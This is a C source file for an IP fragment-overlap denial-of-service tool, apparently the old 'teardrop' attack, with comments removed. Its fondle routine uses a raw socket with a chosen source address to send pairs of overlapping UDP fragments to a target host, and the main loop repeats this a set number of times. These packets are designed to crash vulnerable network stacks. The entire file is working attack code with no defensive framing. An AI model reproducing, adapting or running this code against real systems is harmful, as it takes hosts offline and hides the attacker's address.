#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>
#define FRG_CONST       0x3
#define PADDING         0x1c
struct udp_pkt {
struct iphdr    ip;
struct udphdr   udp;
char data[PADDING];
} pkt;
int     udplen=sizeof(struct udphdr),
iplen=sizeof(struct iphdr),
datalen=100,
psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
spf_sck;
void usage(void) {
        exit(0);
}
u_long host_to_ip(char *host_name) {
static  u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason) {
close(spf_sck);
exit(-1);
}
int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
           int dst_prt) {
int     bs;
struct  sockaddr_in to;
memset(&pkt, 0, psize);
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(udplen + iplen + PADDING);
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = IP_UDP;
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons(0x2000);        
pkt.udp.source = htons(src_prt);        
pkt.udp.dest = htons(dst_prt);
pkt.udp.len = htons(8 + PADDING);
to.sin_family = AF_INET;
to.sin_port = src_prt;
to.sin_addr.s_addr = dst_addr;
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
pkt.ip.frag_off = htons(FRG_CONST + 1);      
pkt.ip.tot_len = htons(iplen + FRG_CONST);
bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
(struct sockaddr *) &to, sizeof(struct sockaddr));
return bs;
}
void main(int argc, char *argv[]) {
u_long  src_addr,
        dst_addr;
int     i,
        src_prt=53,
        dst_prt=53,
        bs = 1,
        pkt_count = 10;      
        if (argc == 4)
        pkt_count = atoi(argv[3]);   
        src_addr = host_to_ip(argv[1]);
        dst_addr = host_to_ip(argv[2]);
        spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
        sizeof(bs)) < 0)
          quit("IP_HDRINCL");
        for (i = 0; i < pkt_count; ++i) {
          fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
          usleep(10000);
        }
}
